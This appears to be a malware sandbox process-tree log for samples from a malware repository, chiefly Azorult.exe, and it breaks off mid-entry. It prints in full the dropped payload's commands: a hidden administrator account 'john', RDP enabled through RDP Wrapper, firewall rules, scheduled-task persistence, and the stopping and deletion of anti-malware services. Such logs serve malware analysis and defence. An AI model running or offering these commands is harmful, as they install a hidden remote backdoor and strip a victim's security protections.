"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
1⤵
PID:3568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
1⤵
PID:3412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
1⤵
PID:2436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
1⤵
PID:1772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5096 /prefetch:8
1⤵
PID:2128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3540 /prefetch:8
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
1⤵
PID:4252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
1⤵
PID:4296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
1⤵
PID:3268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
1⤵
PID:4076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:8
1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1804,9784501955410685956,14779226567144830695,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2868 /prefetch:2
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2020

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1368

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Pony\metrofax.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3408
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2276

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Azorult.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Azorult.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1796
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:692
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Runs .reg file with regedit
        
        PID:4900
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:336
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:4404
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4112
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4644
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4648
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:5452
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:6032
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:6056
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:6072
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:6088
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1168
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2480
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:2764
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:5364
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:5788
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5808
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6012
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:5452
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:5700
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5996
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:5388
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:6088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:5644
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        
        PID:5144
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:5784
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3184
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:5412
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:5168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5264
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:6076
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5908
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:6020
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Executes dropped EXE
      PID:5736
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5256
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\43FB.tmp\43FC.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:6080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5752
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:4112
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5972
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:6024
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:2588
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:5232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:5136
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:980
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Creates scheduled task(s)
      PID:5672
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:1456
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:5532
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5964
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1156
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6080
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:3484
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:2448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:4064
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:2228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:8
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:2948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:4648
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:4564
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:1256
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:4904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:4852
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:1956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:4824
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:3556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:4564
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  PID:656
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:3024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:728
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:2980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:1296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:4844
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:3408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:2300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:2556
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:5084
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:2980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:5208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:3432
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:5264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5356
- C:\Windows\SysWOW64\cmd.exe
